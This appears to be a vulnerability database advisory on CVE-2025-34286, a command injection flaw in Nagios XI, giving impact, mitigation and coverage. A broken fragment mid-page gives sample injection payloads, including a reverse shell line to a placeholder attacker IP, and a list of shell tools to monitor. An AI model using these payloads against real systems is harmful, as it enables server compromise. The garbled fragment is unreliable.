
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-34286 is an OS command injection vulnerability in Nagios XI's Core Config Manager (CCM) Run Check command that allows authenticated administrators to execute arbitrary shell commands on the server. It affects all Nagios XI versions prior to 2026R1. The vulnerability was published on October 30, 2025, with a patch released in November 2025. It carries a CVSS v3.1 base score of 7.2 (High) and a CVSS v4.0 base score of 9.4 (Critical) (Nagios Security, VulnCheck Advisory).
The root cause is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). Nagios XI's CCM Run Check feature insufficiently validates and escapes user-supplied parameters before incorporating them into backend shell command lines, allowing shell metacharacters to be injected and executed by the server. Exploitation requires network access and an authenticated administrator account (high privileges), but no user interaction is needed. The injected commands execute with the privileges of the Nagios XI web application user (VulnCheck Advisory, Nagios Security).
Successful exploitation allows an authenticated administrator to execute arbitrary commands on the underlying host operating system with the privileges of the Nagios XI web application user. This can lead to full compromise of the host, including unauthorized data access (confidentiality), system manipulation (integrity), and service disruption (availability). The compromised system could further serve as a pivot point for lateral movement within the network (VulnCheck Advisory).
As of the time of reporting, there is no public proof-of-concept exploit and no evidence of active in-the-wild exploitation (Feedly). The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.319%, indicating a low current probability of exploitation in the wild. Exploitation is constrained by the requirement for authenticated administrator-level access, which limits the attack surface.
; id, $(whoami), or a reverse shell payload such as ; bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1) into the relevant input field used to build the backend command line.;, |, $(), backticks, &&, ||)./bin/bash, curl, wget, nc, python) that are not part of normal monitoring operations.Nagios has released version 2026R1 which addresses this vulnerability; all users should upgrade immediately (Nagios Security, Nagios Changelog). As interim mitigations, organizations should implement strict access controls and multi-factor authentication (MFA) for administrator accounts, limit network exposure of the Nagios XI management interface (e.g., restrict access via firewall rules to trusted IP ranges), and monitor and audit all administrative actions within the platform.
The vulnerability received coverage from Heise (English edition), which reported on security issues affecting both IBM Tivoli Monitoring and Nagios XI (Heise). Security aggregator BeyondMachines noted the patching of critical vulnerabilities in Nagios XI 2026R1 (BeyondMachines). Community discussion was observed on Mastodon/infosec.exchange, though no major researcher commentary or widespread social media reaction has been documented.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."